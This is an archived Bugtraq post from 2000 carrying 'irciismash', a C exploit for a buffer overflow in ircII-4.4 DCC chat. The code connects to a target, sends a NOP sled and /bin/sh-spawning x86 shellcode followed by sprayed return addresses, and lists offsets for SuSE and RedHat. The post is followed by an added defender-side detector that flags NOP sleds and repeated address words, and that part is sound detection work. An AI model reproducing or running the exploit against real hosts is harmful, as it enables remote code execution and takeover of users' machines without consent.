Bugtraq mailing list archives
Fwd: ircii-4.4 buffer overflow
From: bladi () EUSKALNET NET (bladi)
Date: Tue, 8 Feb 2000 07:57:28 +0100
/*
 * ircii-4.4 exploit by bladi & aLmUDeNa
 *
 * A buffer overflow in ircII DCC chat allows executing arbitrary code.
 *
 * Affected: ircII-4.4
 * Patch:    Upgrade to ircII-4.4M
 *           ftp://ircftp.au.eterna.com.au/pub/ircII/ircii-4.4M.tar.gz
 * Offset:   SuSe 6.x : 0xbfffe3ff
 *           RedHat   : 0xbfffe888
 *
 * Thanks to: #warinhell, #hacker_novatos
 * Special thanks go to: Topo[lb]
 * Greetings to everyone who knows us, especially to eva ;)
 *
 * (bladi () euskalnet net)
 */

#include <stdio.h>
#include <stdlib.h>      /* exit(), atoi() */
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>   /* inet_ntoa(), inet_addr() */

char *h_to_ip(char *hostname);

/* Resolve a hostname to a dotted-quad string. */
char *h_to_ip(char *hostname)
{
    struct hostent *hozt;
    struct sockaddr_in tmp;
    struct in_addr in;

    if ((hozt = gethostbyname(hostname)) == NULL) {
        printf(" ERROR: IP incorrecta\n");
        exit(0);
    }
    memcpy((caddr_t)&tmp.sin_addr.s_addr, hozt->h_addr, hozt->h_length);
    memcpy(&in, &tmp.sin_addr.s_addr, 4);
    return inet_ntoa(in);
}

int main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    char *hostname;
    char nops[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    char *shell =
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
        "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
        "\x80\xe8\xdc\xff\xff\xff/bin/sh";
    int outsocket, tnt, i;

    printf(" irciismash ver: 1.0\n");
    printf(" by \n");
    printf(" bladi & aLmUDeNa\n\n");

    if (argc < 3) {
        printf("Usage : %s hostname port\n", argv[0]);
        exit(-1);
    }
    hostname = argv[1];

    /* Connect to the target host and port given on the command line. */
    outsocket = socket(AF_INET, SOCK_STREAM, 0);
    sin.sin_family = AF_INET;
    sin.sin_port = htons(atoi(argv[2]));
    sin.sin_addr.s_addr = inet_addr(h_to_ip(hostname));
    if (connect(outsocket, (struct sockaddr *)&sin, sizeof(sin)) == -1) {
        printf(" ERROR: El puerto esta cerradito :_(\n");
        exit(0);
    }

    printf("[1]- Noping\n [");
    for (i = 0; i < 47; i++) {
        if (!(i % 7)) {
            usleep(9);
            printf(".");
            fflush(stdout);
        }
        write(outsocket, nops, strlen(nops));
    }
    printf("]\n");
    printf(" Noped\n");

    printf("[2]- Injectin shellcode\n");
    write(outsocket, shell, strlen(shell));
    usleep(999);
    printf(" Injected\n");

    printf("[3]- Waiting\n [");
    for (i = 0; i < 299; i++) {
        printf(".");
        fflush(stdout);
        usleep(99);
        write(outsocket, "\xff", strlen("\xff"));
        write(outsocket, "\xbf", strlen("\xff"));
        write(outsocket, "\xff", strlen("\xe9"));
        write(outsocket, "\xe3", strlen("\xff"));
    }
    printf("]\n[4]- Xploit \n - --(DoNe)-- -\n");

    close(outsocket);
    return 0;
}
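A defender-side counterpart, added here and not part of bladi's post or of ircII: the payload above has a recognisable shape on the wire, namely a long run of 0x90 NOP bytes, a short opaque shellcode blob, and then one 4-byte address word repeated over and over. The C below scans a DCC chat payload for those two features, which is the kind of heuristic an IDS signature or a hardened client could apply before handing data to a fixed-size buffer. The thresholds (NOP_SLED_MIN, ADDR_REPEAT_MIN), the sample buffers, and the filler bytes standing in for shellcode and for the address word are all constructed for this example.

```c
#include <stdio.h>
#include <stddef.h>
#include <string.h>

/* Constructed thresholds for this example: chat text never carries runs like these. */
#define NOP_SLED_MIN    32  /* consecutive 0x90 bytes */
#define ADDR_REPEAT_MIN  8  /* consecutive copies of one 4-byte word */

/* Length of the longest run of the byte `b` in buf[0..len). */
size_t longest_byte_run(const unsigned char *buf, size_t len, unsigned char b)
{
    size_t best = 0, cur = 0;
    for (size_t i = 0; i < len; i++) {
        cur = (buf[i] == b) ? cur + 1 : 0;
        if (cur > best)
            best = cur;
    }
    return best;
}

/* Largest number of back-to-back copies of any 4-byte word, tried at every
 * byte offset so an address sprayed at an odd alignment is still seen.
 * Returns 0 when the buffer is shorter than one word. */
size_t longest_word_repeat(const unsigned char *buf, size_t len)
{
    size_t best = 0;
    for (size_t start = 0; start + 4 <= len; start++) {
        size_t count = 1, i = start + 4;
        while (i + 4 <= len && memcmp(buf + start, buf + i, 4) == 0) {
            count++;
            i += 4;
        }
        if (count > best)
            best = count;
    }
    return best;
}

/* 1 when the payload shows either overflow signature, else 0. */
int dcc_payload_suspicious(const unsigned char *buf, size_t len)
{
    return longest_byte_run(buf, len, 0x90) >= NOP_SLED_MIN
        || longest_word_repeat(buf, len) >= ADDR_REPEAT_MIN;
}

/* Constructed sample 1: an ordinary DCC chat line. */
static const unsigned char benign_msg[] = "hi, did you get the file I sent?\n";

/* Constructed sample 2: same layout as the payload in the post, with made-up
 * filler bytes standing in for the shellcode and for the return address word. */
size_t build_sled_sample(unsigned char *out, size_t cap)
{
    static const unsigned char prefix[] = "DCC CHAT chat ";          /* 14 bytes */
    static const unsigned char blob[]   = { 0x01, 0x02, 0x03, 0x04 }; /* stand-in "shellcode" */
    static const unsigned char word[]   = { 0xaa, 0xbb, 0xcc, 0xdd }; /* stand-in address */
    size_t n = 0;

    if (cap < 14 + 64 + 4 + 16 * 4)
        return 0;
    memcpy(out + n, prefix, 14);  n += 14;
    memset(out + n, 0x90, 64);    n += 64;  /* NOP sled */
    memcpy(out + n, blob, 4);     n += 4;
    for (int k = 0; k < 16; k++) {          /* sprayed address word */
        memcpy(out + n, word, 4);
        n += 4;
    }
    return n;
}

int check_benign(void)
{
    return dcc_payload_suspicious(benign_msg, sizeof benign_msg - 1);
}

int check_sled(void)
{
    unsigned char buf[256];
    size_t n = build_sled_sample(buf, sizeof buf);
    return dcc_payload_suspicious(buf, n);
}

/* Raw measurements for the sled sample, exposed for inspection. */
size_t sample_nop_run(void)
{
    unsigned char buf[256];
    size_t n = build_sled_sample(buf, sizeof buf);
    return longest_byte_run(buf, n, 0x90);
}

size_t sample_word_repeat(void)
{
    unsigned char buf[256];
    size_t n = build_sled_sample(buf, sizeof buf);
    return longest_word_repeat(buf, n);
}

int main(void)
{
    printf("benign sample suspicious: %d\n", check_benign());
    printf("sled sample suspicious:   %d\n", check_sled());
    return 0;
}
```

The word-repeat scan deliberately tries every byte offset rather than stepping by four: the post's own loop sends the address bytes one at a time in a cycle, so the aligned 4-byte word only lines up at some offset into the stream, and a checker that assumed word alignment would miss it.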